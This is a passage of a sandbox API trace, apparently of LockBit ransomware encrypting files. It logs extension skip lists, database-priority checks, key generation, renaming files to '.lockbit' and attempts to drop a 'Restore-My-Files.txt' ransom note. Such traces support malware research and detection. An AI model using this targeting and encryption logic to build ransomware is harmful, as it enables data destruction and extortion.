Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.599] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.599] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.600] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c6d300, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x91c6d300, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x70f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01293_.WMF", cAlternateFileName="")) returned 1 [0162.600] lstrcmpiW (lpString1=".", lpString2="NA01293_.WMF") returned -1 [0162.600] lstrcmpiW (lpString1="..", lpString2="NA01293_.WMF") returned -1 [0162.600] PathFindExtensionW (pszPath="NA01293_.WMF") returned=".WMF" [0162.600] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.600] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.601] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.601] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.602] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01293_.WMF") returned 1 [0162.603] lstrcmpiW (lpString1="ntldr", lpString2="NA01293_.WMF") returned 1 [0162.603] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01293_.WMF") returned 1 [0162.603] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01293_.WMF") returned -1 [0162.603] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01293_.WMF") returned -1 [0162.603] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01293_.WMF") returned 1 [0162.603] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01293_.WMF") returned -1 [0162.603] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.603] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF") returned=".WMF" [0162.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.603] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.603] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.604] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.605] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.605] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.605] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF.lockbit") returned 72 [0162.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01293_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0162.606] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.606] malloc (_Size=0x40068) returned 0x3f70048 [0162.606] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=28912) returned 1 [0162.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0162.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0162.607] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.612] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.612] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.614] free (_Block=0x1fa2ed8) [0162.614] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.614] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.614] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.614] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29f0600, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x6a370b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd29f0600, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01354_.WMF", cAlternateFileName="")) returned 1 [0162.614] lstrcmpiW (lpString1=".", lpString2="NA01354_.WMF") returned -1 [0162.614] lstrcmpiW (lpString1="..", lpString2="NA01354_.WMF") returned -1 [0162.614] PathFindExtensionW (pszPath="NA01354_.WMF") returned=".WMF" [0162.614] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.614] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.615] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.616] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.616] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01354_.WMF") returned 1 [0162.616] lstrcmpiW (lpString1="ntldr", lpString2="NA01354_.WMF") returned 1 [0162.616] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01354_.WMF") returned 1 [0162.616] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01354_.WMF") returned -1 [0162.617] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01354_.WMF") returned -1 [0162.617] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01354_.WMF") returned 1 [0162.617] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01354_.WMF") returned -1 [0162.617] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.617] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF") returned=".WMF" [0162.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.617] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.617] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.618] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.618] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF.lockbit") returned 72 [0162.618] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01354_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0162.619] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.619] malloc (_Size=0x40068) returned 0x3e70008 [0162.620] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=5806) returned 1 [0162.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.620] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0162.620] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0162.621] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0162.626] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.626] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.627] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.628] free (_Block=0x1fa2ed8) [0162.628] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01354_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.628] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.628] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.628] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf0b7f00, ftCreationTime.dwHighDateTime=0x1bd4b3c, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcf0b7f00, ftLastWriteTime.dwHighDateTime=0x1bd4b3c, nFileSizeHigh=0x0, nFileSizeLow=0x4732, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA01356_.WMF", cAlternateFileName="")) returned 1 [0162.628] lstrcmpiW (lpString1=".", lpString2="NA01356_.WMF") returned -1 [0162.628] lstrcmpiW (lpString1="..", lpString2="NA01356_.WMF") returned -1 [0162.628] PathFindExtensionW (pszPath="NA01356_.WMF") returned=".WMF" [0162.628] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.628] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.629] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.629] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA01356_.WMF") returned 1 [0162.630] lstrcmpiW (lpString1="ntldr", lpString2="NA01356_.WMF") returned 1 [0162.630] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA01356_.WMF") returned 1 [0162.630] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA01356_.WMF") returned -1 [0162.630] lstrcmpiW (lpString1="autorun.inf", lpString2="NA01356_.WMF") returned -1 [0162.630] lstrcmpiW (lpString1="thumbs.db", lpString2="NA01356_.WMF") returned 1 [0162.630] lstrcmpiW (lpString1="iconcache.db", lpString2="NA01356_.WMF") returned -1 [0162.630] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.630] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF") returned=".WMF" [0162.630] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.630] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.630] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.631] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 